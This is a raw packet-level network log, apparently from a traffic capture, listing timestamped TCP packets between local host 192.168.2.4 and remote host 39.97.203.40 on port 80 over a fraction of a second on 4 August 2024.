                                          Aug 4, 2024 12:47:09.795223951 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.795241117 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.795284033 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.795376062 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.795389891 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.795439005 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.795506954 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811620951 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811661005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811676979 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811717987 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.811930895 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811945915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811961889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.811979055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.812015057 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.812015057 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.812096119 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.834849119 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.834918022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.834933996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.835007906 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.835024118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.835041046 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.835057020 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.835093021 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.835093021 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.835093021 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.835745096 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.835808039 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.843827009 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.843848944 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.843866110 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.843919039 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.844209909 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844232082 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844249010 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844265938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844392061 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.844392061 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.844734907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844785929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.844854116 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844871044 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.844916105 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.845120907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845136881 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845151901 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845166922 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845184088 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.845215082 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.845720053 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845902920 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845917940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.845957041 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.846041918 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846076965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846091986 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.846093893 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846128941 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846138954 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.846458912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846509933 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.846648932 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846673012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.846721888 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.847153902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.847172022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.847187996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.847202063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.847218037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.847218037 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.847259045 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.852158070 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852214098 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.852302074 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852315903 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852468014 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.852658033 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852673054 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852688074 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852701902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.852715969 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.852750063 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.865235090 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865256071 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865272999 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865355968 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.865405083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865422010 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865438938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865772963 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.865773916 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.865928888 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865945101 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865958929 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865974903 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.865991116 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.866121054 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.866122007 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.866779089 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.866795063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.866810083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.866832018 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.866868019 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.867095947 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867113113 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867155075 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.867427111 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867444038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867460012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867489100 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.867899895 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867916107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.867949963 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.869333029 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.869385958 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.869435072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.869611979 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.869627953 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.869659901 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.869945049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.869997025 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.870050907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.870285988 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.870335102 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.871010065 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871093035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871108055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871141911 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.871319056 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871368885 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.871464968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871481895 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871496916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871510029 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.871525049 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.871558905 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.874015093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874110937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874125957 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874161005 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.874340057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874461889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874479055 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874494076 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874506950 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.874588966 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.874588966 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.874588966 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.875962973 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876060009 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876076937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876113892 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.876293898 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876346111 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.876400948 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876425982 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876442909 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876456022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.876468897 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.876518965 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.878906012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.878983974 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.878998995 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.879034042 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.879209042 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.879225016 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.879401922 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.879431963 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.879448891 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.879463911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.879488945 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.879529953 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.884043932 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884347916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884368896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884385109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884401083 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884417057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884408951 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.884434938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884474039 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.884474039 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.884753942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.884921074 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.901135921 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901158094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901175022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901226997 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.901496887 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901519060 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901535034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901547909 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.901552916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.901580095 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.923825979 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.923933983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.923952103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.924087048 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.924088001 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.924170017 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.924185038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.924200058 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.924216032 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.924268007 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.924268007 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.932636976 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.932677031 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.932693005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.932853937 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.932965040 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.932982922 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.932998896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.933182955 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.933183908 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.933363914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.933480978 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.933537006 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.933613062 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.933661938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.933679104 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.933712006 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.934154987 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.934171915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.934187889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.934207916 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.934237003 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.940148115 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940217018 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940233946 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940279007 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.940515041 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940582037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940598965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940613985 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940629959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.940800905 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.940802097 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.940802097 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.941338062 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.941354036 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.941371918 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.941386938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.941404104 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.941437006 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.941437006 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.942260981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.942320108 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.958095074 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958169937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958187103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958293915 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.958695889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958718061 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958734035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958750963 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.958833933 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.958833933 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.959117889 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.959209919 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.959228039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.959244013 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.959260941 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.959286928 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.959287882 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.959371090 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.960114956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.960131884 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.960155964 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.960171938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.960187912 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.960191011 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.960206032 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.960216045 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.960254908 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.961028099 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961045027 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961061001 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961076021 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961090088 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.961091995 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961144924 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.961950064 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961966991 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961982965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.961999893 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.962003946 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.962013960 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.962025881 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.962030888 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.962064981 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.964883089 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964900017 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964915037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964931011 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964936972 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.964946032 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964962006 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.964962959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964978933 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.964992046 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.964994907 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965013981 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965044975 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965070009 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965085983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965089083 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965102911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965116024 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965131044 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965131998 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965145111 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965150118 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965162039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965177059 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965193033 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965193987 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965209961 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965212107 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965260983 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965651989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965668917 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965714931 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965807915 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965821981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965837002 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965852022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965867996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965867996 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965883017 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965889931 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.965898037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.965924978 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.967658997 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.967705965 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.967757940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.967773914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.967827082 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.967941046 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.967992067 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.968008995 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.968024969 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.968041897 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.968070984 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.968411922 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.972847939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.972948074 CEST804973539.97.203.40192.168.2.4
